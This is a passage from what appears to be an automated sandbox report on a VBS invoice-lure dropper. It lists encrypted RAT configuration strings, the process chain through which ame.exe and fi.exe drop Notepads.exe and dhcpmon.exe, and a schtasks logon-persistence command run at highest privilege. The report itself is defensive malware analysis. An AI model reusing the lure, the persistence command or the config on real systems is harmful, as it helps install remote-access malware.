'guaOpPvLUuTY1lGiMRcMdLKZx2lI+Z0hP1IEWzhfwOExZiFB7mJpRsbJNVbckUa6w/E7gsxM7nJ91FblGT+06XKUW1Zt8fn+EmcpaLTPFOHa71dd/dkgw4iKFll6uK0fEpjZKhw90nAvt7q7xo/Sn8kNd6Q0qObHLuFuVK8soCYl5X0s4Khla/FB4I+wTl53FnTbGqpBLjW3Fo28IFGoCdJxJ94Mom2WT2996GM3npHKsbmwtpDdlNfeiVucvSjXrwHp1p+vLXcyA+66jp0v5DBxnmiMHDZPPTLX81sNEZkQgdEAKfTn0Y0edIG6aaHTeEPdAkVioYo
            Source: 3.0.ame.exe.500000.0.unpack, Client/Settings.csBase64 encoded string: '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
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Settings.csBase64 encoded string: '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
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Settings.csBase64 encoded string: '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
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: ame.exe.1.dr, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: ame.exe.1.dr, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Notepads.exe.3.dr, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: Notepads.exe.3.dr, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@14/9@20/3
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023410DA AdjustTokenPrivileges,4_2_023410DA
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023410A3 AdjustTokenPrivileges,4_2_023410A3
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeFile created: C:\Users\user\AppData\Roaming\Notepads.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeMutant created: \Sessions\1\BaseNamedObjects\871-085a33d91457
            Source: C:\Users\user\AppData\Local\Temp\fi.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ac555290-50d4-4120-9390-e76e4f948dd7}
            Source: C:\Users\user\AppData\Local\Temp\fi.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ame.exeJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Invoice No F1019855_PDF.vbsVirustotal: Detection: 29%
            Source: Invoice No F1019855_PDF.vbsReversingLabs: Detection: 23%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'
            Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Notepads.exe C:\Users\user\AppData\Roaming\Notepads.exe
